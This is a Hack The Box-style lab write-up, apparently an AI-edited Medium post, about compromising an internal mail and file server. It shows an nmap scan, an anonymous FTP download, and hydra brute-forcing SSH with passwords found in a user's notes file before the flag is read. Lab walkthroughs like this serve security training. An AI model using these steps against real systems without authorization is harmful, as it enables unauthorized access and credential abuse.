Here's an improved and edited version of your Medium post:
We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format:
HTB{...}
In this post, we will review the security of the second server, which is an internal server within the inlanefreight.htb
domain. This server manages and stores emails and files, and serves as a backup for some of the company's processes. According to internal conversations, this server is used relatively rarely and mainly for testing purposes.
Task
Assess the target server and find the flag.txt
file. Submit the contents of this file as your answer.
Solution Steps
- Enumerate the Target
Perform a full port scan and service enumeration on the target server:
sudo nmap -sV -p- 10.129.xxx.xx -Pn
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
110/tcp open pop3 Dovecot pop3d
995/tcp open ssl/pop3 Dovecot pop3d
2121/tcp open ftp?
30021/tcp open ftp?
- Download Files via FTP
Use wget
to mirror the contents of the FTP server:
wget -m --no-passive ftp://anonymous:anonymous@10.129.xxx.xx:30021/
Output:
--2024-08-01 09:06:31-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/
=> ‘10.129.xxx.xx:30021/.listing’
Connecting to 10.129.xxx.xx:30021... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.
==> PWD ... done.
==> TYPE I ... done.
==> CWD not needed.
==> PORT ... done.
==> LIST ... done.
--2024-08-01 09:06:38-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/simon/
=> ‘10.129.xxx.xx:30021/simon/.listing’
==> CWD (1) /simon ... done.
==> PORT ... done.
==> LIST ... done.
...
--2024-08-01 09:06:39-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/simon/mynotes.txt
=> ‘10.129.xxx.xx:30021/simon/mynotes.txt’
==> CWD not required.
==> PORT ... done.
==> RETR mynotes.txt ... done.
Length: 153
...
‘10.129.xxx.xx:30021/simon/mynotes.txt’ saved [153]
FINISHED --2024-08-01 09:06:39--
Total wall clock time: 8.3s
Downloaded: 3 files, 517 in 0.002s (215 KB/s)
View the Contents of the Downloaded File:
cat 10.129.xxx.xx:30021/simon/mynotes.txt
Output:
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
...
- Brute-Force SSH Login
Use hydra
to brute-force the SSH login using the passwords found in mynotes.txt
:
hydra -l simon -P mynotes.txt -u 10.129.xxx.xx ssh
Results:
[22][ssh] host: 10.129.xxx.xx login: simon password: **************
- Access the Server via SSH
Log into the server using the obtained credentials:
ssh simon@10.129.XXX.xx
- Find and Retrieve the Flag
List the contents of the home directory and display the flag:
ls
flag.txt Maildir
cat flag.txt
Output:
HTB{1qay2wsx3*******_******}
By following these steps, we successfully enumerated the services on the target server, retrieved files from the FTP server, brute-forced the SSH login, and accessed the server to find the flag.
This demonstrates an effective approach to assessing the security of internal email and file management services.
Top comments (0)